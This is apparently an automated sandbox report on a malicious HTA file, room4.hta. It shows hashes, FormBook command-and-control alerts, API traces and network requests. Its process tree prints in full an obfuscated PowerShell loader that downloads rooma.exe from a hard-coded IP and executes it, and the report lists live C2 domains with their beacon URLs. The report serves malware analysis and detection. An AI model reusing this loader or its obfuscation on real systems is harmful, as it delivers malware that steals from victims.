Summary | ZeroBOX

room4.hta

Generic Malware Antivirus Malicious Library PE File DLL PE32 PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us May 24, 2024, 9:37 a.m. May 24, 2024, 9:41 a.m.
Size 9.9KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 409f1bada32d81974fd8606be4cbc943
SHA256 44973eb6e87b61951a5244aab9cf1fc9d04d2d97ab9ec6914c56b54f3d3b7743
CRC32 75A32742
ssdeep 192:QSc8pfJ204eoWujo+tVo1oLfbAJkJ9M5f29:BcgonouoC
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\room4.hta

    1460
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;

      2104

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49171 -> 154.215.72.110:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected
TCP 192.168.56.103:49191 -> 91.195.240.94:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected
TCP 192.168.56.103:49200 -> 66.29.149.46:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 20.86.128.223:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 20.86.128.223:80 -> 192.168.56.103:49165 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 20.86.128.223:80 -> 192.168.56.103:49165 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 20.86.128.223:80 -> 192.168.56.103:49165 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 202.172.28.202:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 116.50.37.244:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected
TCP 192.168.56.103:49185 -> 46.30.213.191:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected
TCP 192.168.56.103:49188 -> 85.159.66.93:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:690
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGc
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: HEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(4712
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: 5,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.Ends
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: With((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -Executi
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: onPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: 125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHR
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: fuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: 47187,47184,47180,47189,47195));[Net.ServicePointManager]:: <<<< SecurityProtoc
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: ol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.Downloa
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: dData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$P
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: DFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};fun
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: ction iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + '
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo =
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: 180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x0000014f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf7c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c0200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bfc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://20.86.128.223/room/rooma.exe
request GET http://20.86.128.223/room/rooma.exe
request POST http://www.3xfootball.com/fo8o/
request GET http://www.3xfootball.com/fo8o/?I0NK=IhZyPQIGe6uK3zPwwQVGm4hCASyaX3xlW2eS79Xk6ut4afzj0LiRHBqZsEmyTx+18GfGhVOagMos+c9dx/PGjLGAfpOvJ7U3hUqpnKd0zHv/hQdGhX4G3JlCydyJ23yerjxn4r8=&Lw8=oat1oSv
request GET http://www.sqlite.org/2016/sqlite-dll-win32-x86-3140000.zip
request POST http://www.kasegitai.tokyo/fo8o/
request GET http://www.kasegitai.tokyo/fo8o/?I0NK=0LNqIGaAWMhMIMLOr1FzuAu+QFTp+Isr9lFre+yu3/9GvRNYi1uHghhDsQ/pqDAQ+wkUrFUIurr7TLyDqzId9vCn3h40hICDSYZjejM1bTxHHnFMxARLyMCZMUhSp6GMEGHL0HI=&Lw8=oat1oSv
request POST http://www.goldenjade-travel.com/fo8o/
request GET http://www.goldenjade-travel.com/fo8o/?I0NK=LFKqyrcu7g1NCa8bIVnmntQ0zrEKrQSprIMLtaWgKJ9bBKQr4dsn0J7ZoYUgIJ+R6Sel8OhXEcHhC7LyM9bkgjIIu2U6i6kbe5asCJcEX28JEcHJIWfCjODnuc7OiogdzaMrHf8=&Lw8=oat1oSv
request POST http://www.antonio-vivaldi.mobi/fo8o/
request GET http://www.antonio-vivaldi.mobi/fo8o/?I0NK=PTl5gU/3CD/Xhg5KAVLGoeqWcilDUK5FTZuVmm6gfrwSjnBrSraU5xyBGUoA1k9xMbAGIU7PLJqf1PTsNd74L3d6+NgzbyGN2pTsiSyIeh1B8hC/nFfIu9UZrk9ku3J39HvVUu8=&Lw8=oat1oSv
request POST http://www.magmadokum.com/fo8o/
request GET http://www.magmadokum.com/fo8o/?I0NK=qL3nKp+YSjoaTomnND+fiETGbzpIgkHGMW8DXsDTZ4AADrD7Wpn1kxM1jYW2/C2WhyBblBh5NUSWrO5bZjyCcVkJYbxxq5QITB2h2xAyEikjbcoqZSmDOCeIE8A+B7hyBKIW8mw=&Lw8=oat1oSv
request POST http://www.rssnewscast.com/fo8o/
request GET http://www.rssnewscast.com/fo8o/?I0NK=x3jV/ECx7FuzXOI+6CNaISj98UIEn47HyCIVaqWvGMMqpfz0YC5wNp/pxM1zEFNKv4nPeGfT8/lZrDaJmccs4488pD+gaHK32CxgTEs5a2vdBlM4hQBa8nlaMF5vesFSU19kJNk=&Lw8=oat1oSv
request POST http://www.techchains.info/fo8o/
request GET http://www.techchains.info/fo8o/?I0NK=vefd0teQh+kbruh+iKW53cdcsQD4oFyRDgCUoL90YCYLczV+Hcc/VZ2eVbboy/u5EgiS3CnxBclKZHyNJ/4ALr08/A/SWk5lVGufGp2P4fG4f3GonqE4cYuaa0/JNC0RZIlRWrU=&Lw8=oat1oSv
request POST http://www.3xfootball.com/fo8o/
request POST http://www.kasegitai.tokyo/fo8o/
request POST http://www.goldenjade-travel.com/fo8o/
request POST http://www.antonio-vivaldi.mobi/fo8o/
request POST http://www.magmadokum.com/fo8o/
request POST http://www.rssnewscast.com/fo8o/
request POST http://www.techchains.info/fo8o/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02540000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2104
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71aa1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2104
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71aa2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02541000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02542000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02517000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02502000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02515000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02503000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02504000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02505000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02506000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02507000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02508000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02509000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04990000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04991000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04992000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04993000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04994000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04995000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04996000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04997000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04998000
